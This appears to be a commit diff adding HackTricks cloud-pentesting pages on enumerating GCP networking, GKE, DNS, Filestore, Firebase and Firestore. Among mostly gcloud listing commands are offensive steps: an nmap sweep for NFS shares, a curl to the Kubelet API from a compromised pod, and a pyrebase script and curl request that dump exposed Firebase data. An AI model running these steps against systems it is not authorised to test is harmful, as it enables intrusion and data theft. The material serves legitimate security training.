* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

112
pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md Normal file
View File

@@ -0,0 +1,112 @@
# GCP - VPC & Networking
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **GCP Compute Networking in a Nutshell**
**VPCs** contains **Firewall** rules to allow incoming traffic to the VPC. VPCs also contains **subnetworks** where **virtual machines** are going to be **connected**.\
Comparing with AWS, **Firewall** would be the **closest** thing to **AWS** **Security Groups and NACLs**, but in this case these are **defined in the VPC** and not in each instance.
## **VPC, Subnetworks & Firewalls in GCP**
Compute Instances are connected **subnetworks** which are part of **VPCs** ([Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc)). In GCP there aren't security groups, there are [**VPC firewalls**](https://cloud.google.com/vpc/docs/firewalls) with rules defined at this network level but applied to each VM Instance.
### Subnetworks
A **VPC** can have **several subnetworks**. Each **subnetwork is in 1 region**.
### Firewalls
By default, every network has two [**implied firewall rules**](https://cloud.google.com/vpc/docs/firewalls#default_firewall_rules): **allow outbound** and **deny inbound**.
When a GCP project is created, a VPC called **`default`** is also created, with the following firewall rules:
* **default-allow-internal:** allow all traffic from other instances on the `default` network
* **default-allow-ssh:** allow 22 from everywhere
* **default-allow-rdp:** allow 3389 from everywhere
* **default-allow-icmp:** allow ping from everywhere
{% hint style="warning" %}
As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances.
{% endhint %}
More **Firewall rules** can be created for the default VPC or for new VPCs. [**Firewall rules**](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following **methods**:
* [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags)
* [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
* **All instances within a VPC**
Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.
This process was automated using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following:
* CSV file showing instance, public IP, allowed TCP, allowed UDP
* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
### Hierarchical Firewall Policies <a href="#hierarchical-firewall-policies" id="hierarchical-firewall-policies"></a>
_Hierarchical firewall policies_ let you create and **enforce a consistent firewall policy across your organization**. You can assign **hierarchical firewall policies to the organization** as a whole or to individual **folders**. These policies contain rules that can explicitly deny or allow connections.
You create and apply firewall policies as separate steps. You can create and apply firewall policies at the **organization or folder nodes of the** [**resource hierarchy**](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy). A firewall policy rule can **block connections, allow connections, or defer firewall rule evaluation** to lower-level folders or VPC firewall rules defined in VPC networks.
By default, all hierarchical firewall policy rules apply to all VMs in all projects under the organization or folder where the policy is associated. However, you can **restrict which VMs get a given rule** by specifying [target networks or target service accounts](https://cloud.google.com/vpc/docs/firewall-policies#targets).
You can read here how to [**create a Hierarchical Firewall Policy**](https://cloud.google.com/vpc/docs/using-firewall-policies#gcloud).
### Firewall Rules Evaluation
<figure><img src="../../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
1. Org: Firewall policies assigned to the Organization
2. Folder: Firewall policies assigned to the Folder
3. VPC: Firewall rules assigned to the VPC
4. Global: Another type of firewall rules that can be assigned to VPCs
5. Regional: Firewall rules associated with the VPC network of the VM's NIC and region of the VM.
## VPC Network Peering
Allows to connect two Virtual Private Cloud (VPC) networks so that **resources in each network can communicate** with each other.\
Peered VPC networks can be in the same project, different projects of the same organization, or **different projects of different organizations**.
These are the needed permissions:
* `compute.networks.addPeering`
* `compute.networks.updatePeering`
* `compute.networks.removePeering`
* `compute.networks.listPeeringRoutes`
[**More in the docs**](https://cloud.google.com/vpc/docs/vpc-peering).
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
* [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

130
pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md Normal file
View File

@@ -0,0 +1,130 @@
# GCP - Containers & GKE Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Containers
In GCP containers you can find most of the containers based services GCP offers, here you can see how to enumerate the most common ones:
```bash
gcloud container images list
gcloud container images list --repository us.gcr.io/<project-name> #Search in other subdomains repositories
gcloud container images describe <name>
gcloud container subnets list-usable
gcloud container clusters list
gcloud container clusters describe <name>
gcloud container clusters get-credentials [NAME]
# Run a container locally
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
# Login & Download
sudo docker login -u oauth2accesstoken -p $(gcloud auth print-access-token) https://HOSTNAME
## where HOSTNAME is gcr.io, us.gcr.io, eu.gcr.io, or asia.gcr.io.
sudo docker pull HOSTNAME/<project-name>/<image-name>
```
### Privesc
In the following page you can check how to **abuse container permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %}
[gcp-container-privesc.md](../gcp-privilege-escalation/gcp-container-privesc.md)
{% endcontent-ref %}
## Node Pools
These are the pool of machines (nodes) that form the kubernetes clusters.
```bash
# Pool of machines used by the cluster
gcloud container node-pools list --zone <zone> --cluster <cluster>
gcloud container node-pools describe --cluster <cluster> --zone <zone> <node-pool>
```
## Kubernetes
For information about what is Kubernetes check this page:
{% content-ref url="../../kubernetes-security/" %}
[kubernetes-security](../../kubernetes-security/)
{% endcontent-ref %}
First, you can check to see if any Kubernetes clusters exist in your project.
```
gcloud container clusters list
```
If you do have a cluster, you can have `gcloud` automatically configure your `~/.kube/config` file. This file is used to authenticate you when you use [kubectl](https://kubernetes.io/docs/reference/kubectl/overview/), the native CLI for interacting with K8s clusters. Try this command.
```
gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION]
```
Then, take a look at the `~/.kube/config` file to see the generated credentials. This file will be used to automatically refresh access tokens based on the same identity that your active `gcloud` session is using. This of course requires the correct permissions in place.
Once this is set up, you can try the following command to get the cluster configuration.
```
kubectl cluster-info
```
You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/).
This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum)
### TLS Boostrap Privilege Escalation
Initially this privilege escalation technique allowed to **privesc inside the GKE cluster** effectively allowing an attacker to **fully compromise it**.
This is because GKE provides [TLS Bootstrap credentials](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/) in the metadata, which is **accessible by anyone by just compromising a pod**.
The technique used is explained in the following posts:
* [https://www.4armed.com/blog/hacking-kubelet-on-gke/](https://www.4armed.com/blog/hacking-kubelet-on-gke/)
* [https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/](https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/)
* [https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/)
Ans this tool was created to automate the process: [https://github.com/4ARMED/kubeletmein](https://github.com/4ARMED/kubeletmein)
However, the technique abused the fact that **with the metadata credentials** it was possible to **generate a CSR** (Certificate Signing Request) for a **new node**, which was **automatically approved**.\
In my test I checked that **those requests aren't automatically approved anymore**, so I'm not sure if this technique is still valid.
### Secrets in Kubelet API <a href="#the-kubelet-api-git-secrets-redux" id="the-kubelet-api-git-secrets-redux"></a>
In [**this post**](https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt3/) it was discovered it was discovered a Kubelet API address accesible from inside a pod in GKE giving the details of the pods running:
```
curl -v -k http://10.124.200.1:10255/pods
```
Even if the API **doesn't allow to modify resources**, it could be possible to find **sensitive information** in the response. The endpoint /pods was found using [**Kiterunner**](https://github.com/assetnote/kiterunner).
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

51
pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md Normal file
View File

@@ -0,0 +1,51 @@
# GCP - DNS Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## GCP - Cloud DNS
Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service.
```bash
# This will usually error if DNS service isn't configured in the project
gcloud dns project-info describe <project>
# Get DNS zones & records
gcloud dns managed-zones list
gcloud dns managed-zones describe <zone>
gcloud dns record-sets list --zone <zone> # Get record of the zone
# Policies
## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks.
gcloud dns response-policies list
## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to.
gcloud dns policies list
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

105
pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md Normal file
View File

@@ -0,0 +1,105 @@
# GCP - Filestore Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases.
You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info.
### Connections
When creating a Filestore instance it's possible to **select the network where it's going to be accessible**.
Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.**
It can also be accessible via a **Private Service Access Connection:**
* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL.
* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**.
* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision.
* The VPC peering will import new routes to your VPC
### Backups
It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**.
### Encryption
By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**.
### Enumeration
If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist.
{% code overflow="wrap" %}
```bash
# Instances
gcloud filestore instances list # Check the IP address
gcloud filestore instances describe --zone <zone> <name> # Check IP and access restrictions
# Backups
gcloud filestore backups list
gcloud filestore backups describe --region <region> <backup>
# Search for NFS shares in a VPC subnet
sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20
```
{% endcode %}
{% hint style="danger" %}
Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\
So you might need to **enumerate VPC peers** to also run nmap over those network ranges.
{% code overflow="wrap" %}
```bash
# Get peerings
gcloud compute networks peerings list
# Get routes imported from a peering
gcloud compute networks peerings list-routes <peering-name> --network=<network-name> --region=<region> --direction=INCOMING
```
{% endcode %}
{% endhint %}
### Privilege Escalation & Post Exploitation
There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges:
{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %}
[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %}
[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

103
pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md Normal file
View File

@@ -0,0 +1,103 @@
# GCP - Firebase Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
### Unauthenticated Enum
Some **Firebase endpoints** could be found in **mobile applications**. It is possible that the Firebase endpoint used is **configured badly grating everyone privileges to read (and write)** on it.
This is the common methodology to search and exploit poorly configured Firebase databases:
1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC.\
You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105\&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK.
3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword
4. You may find something like this URL “_**https://xyz.firebaseio.com/**_”
5. Next, go to the browser and **navigate to the found URL**: _https://xyz.firebaseio.com/.json_
6. 2 type of responses can appear:
1. “**Permission Denied**”: This means that you cannot access it, so it's well configured
2. “**null**” response or a bunch of **JSON data**: This means that the database is public and you at least have read access.
1. In this case, you could **check for writing privileges**, an exploit to test writing privileges can be found here: [https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit](https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit)
**Interesting note**: When analysing a mobile application with **MobSF**, if it finds a firebase database it will check if this is **publicly available** and will notify it.
Alternatively, you can use [Firebase Scanner](https://github.com/shivsahni/FireBaseScanner), a python script that automates the task above as shown below:
```bash
python FirebaseScanner.py -f <commaSeperatedFirebaseProjectNames>
```
### Authenticated Enum
If you have credentials to access the Firebase database you can use a tool such as [**Baserunner**](https://github.com/iosiro/baserunner) to access more easily the stored information. Or a script like the following:
```python
#Taken from https://blog.assetnote.io/bug-bounty/2020/02/01/expanding-attack-surface-react-native/
#Install pyrebase: pip install pyrebase4
import pyrebase
config = {
"apiKey": "FIREBASE_API_KEY",
"authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
"databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
"storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}
firebase = pyrebase.initialize_app(config)
db = firebase.database()
print(db.get())
```
To test other actions on the database, such as writing to the database, refer to the Pyrebase4 documentation which can be found [here](https://github.com/nhorvath/Pyrebase4).
### Access info with APPID and API Key <a href="#access-info-with-appid-and-api-key" id="access-info-with-appid-and-api-key"></a>
If you decompile the iOS application and open the file `GoogleService-Info.plist` and you find the API Key and APP ID:
* API KEY **AIzaSyAs1\[...]**
* APP ID **1:612345678909:ios:c212345678909876**
You may be able to access some interesting information
**Request**
`curl -v -X POST "https://firebaseremoteconfig.googleapis.com/v1/projects/612345678909/namespaces/firebase:fetch?key=AIzaSyAs1[...]" -H "Content-Type: application/json" --data '{"appId": "1:612345678909:ios:c212345678909876", "appInstanceId": "PROD"}'`
## References <a href="#references" id="references"></a>
* [https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)
* [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

43
pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md Normal file
View File

@@ -0,0 +1,43 @@
# GCP - Firestore Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
```bash
gcloud firestore indexes composite list
gcloud firestore indexes composite describe <index>
gcloud firestore indexes fields list
gcloud firestore indexes fields describe <name>
gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

258
pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md Normal file
View File

@@ -0,0 +1,258 @@
# GCP - IAM, Principals & Org Policies Enum
{% hint style="success" %}
